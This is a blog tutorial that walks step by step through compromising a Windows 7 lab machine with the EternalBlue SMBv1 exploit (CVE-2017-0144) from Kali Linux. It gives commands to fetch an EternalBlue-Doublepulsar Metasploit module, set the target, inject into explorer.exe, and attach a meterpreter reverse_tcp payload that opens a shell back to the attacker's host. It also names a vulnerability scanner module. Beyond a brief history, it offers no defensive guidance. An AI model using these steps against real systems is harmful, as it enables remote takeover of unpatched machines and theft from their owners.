Hacking Windows Server using EternalBlue Exploit

Introduction

EternalBlue is nothing but an exploit that was actually developed and used by the National Security Agency (NSA). But this was somehow leaked by the hacker group named the Shadow Brokers in April 2017 and this exploit leaked online was then used in the worldwide WannaCry ransomware attack and NotPetya ransomware which had devastating effects. So what this exploit does is that it basically exploits a vulnerability in the Windows Server Message Block 1.0 (SMBv1). SMB is a protocol used by Windows machines in the same network to share files.  So in this vulnerability, the SMBv1 server was unable to handle specially crafted payloads resulting in a remote code execution. This vulnerability has already been registered and could be found under CVE-2017-0144.

So let’s start with our demo

Our Victim: Windows 7 (IP address: 192.168.0.103)

Our Attacker: Kali (IP address: 192.168.0.105)

 

So Before starting, make sure you have wine installed in your kali. If not type in the following commands in your Kali. (wine is used to run exe files or windows applications in other operating systems)

dpkg –add-architecture i386

apt-get update

apt-get install wine32

Next, we need to download the exploit and place it in our Metasploit db.

so we can get our exploit from the following link: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

 

Go to your terminal and type:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 

 

 

Now got to the folder where the exploit has been downloaded.

 

 

Copy the Eternal Blue-Doublepulsar.rb file and place it under the following directory /usr/share/metasploit-framework /module/exploits/windows/smb/

 

 

Now since everything is set up, start your Metasploit framework by typing msfconsole

 

 

Now serach for eternalblue exploit

 

 

Now type the following to use our doublepular exploit:

use exploit/windows/smb/eternalblue_doublepulsar

then type: show options 

to list down all the options that are required to be filled up by us.

 

Next we need to set our remote or target host and the process to which we want to migrate into, so type the following commands:

set RHOST 192.168.0.103

set PROCESSINJECT explorer.exe

 

 

So now we need a payload that would give us a reverse connection in our meterpreter:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

 

Set your host that would listen to your reverse connection (attacker’s IP address)

set LHOST 192.168.0.105

Now as everything is setup, just type in exploit and you are ready to go.

So thus we got our meterpreter session. Now just type in shell to give you the command prompt of your victim machine.

 

NOTE: There is also a module in Metasploit to check if the victim’s machine is vulnerable to this exploit or not. You could use this first to first check and then use the exploit as explained above to carry out the attack. We could use the module use auxiliary/scanner/smb/smb_ms17_010 and then set your target host to initiate the scan.

So that’s for now. See you next time. Goodbye

You can have a look at my previous article on Web Application Security. Here is the link of the article

Loved what you read?

If so, then kindly follow and share our website for much more interesting stuffs? ?

For any queries please send a Hi to my Linkedin Handle: Here

 

You may also like...

2 Responses

  1. anonymous says:

    Knowledgeable post. Thankyou. ~blackshark-3215

Leave a Reply

Your email address will not be published. Required fields are marked *